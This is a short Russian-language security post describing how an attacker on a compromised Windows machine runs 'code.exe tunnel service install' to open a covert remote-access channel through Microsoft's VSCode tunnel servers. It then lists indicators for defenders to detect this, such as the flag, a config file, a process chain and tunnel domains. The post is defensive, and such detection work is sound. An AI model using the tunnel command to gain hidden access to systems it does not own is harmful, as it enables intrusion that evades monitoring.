– Злоумышленник включает опцию «Туннель разработки» из графического интерфейса VSCode на скомпрометированной машине, либо включает эту опцию с помощью консольной версии (её легче загрузить на хост без VSCode):
code.exe tunnel [service install] [--name "tunnel-name"]
– Поднимается туннель с легитимными серверами Microsoft Azure (домен
*.tunnels.api.visualstudio.com). – Атакующий подключается по ссылкам вида
vscode.dev/tunnel/<victim's hostname>/<tunnel name>. – IP атакующего не видно, а сам трафик зашифрован внутри SSH-over-HTTPS.
Что ловить защитникам:
– Запуски
code.exe с ключиком tunnel в командной строке – Создание файла
code_tunnel.json в %UserProfile%\.vscode-cli\ – Цепочку процессов
code.exe -> cmd.exe -> node.exe -> winptyagent.exe – Домены в трафике или резолвах DNS
*.tunnels.api.visualstudio.com и *.devtunnels.ms Больше деталей про туннели через VSCode и не только – на конференции OFFZONE 23 августа в 13:00, в докладе Кирилла Магаськина "LOLApps: подножный корм хакера".
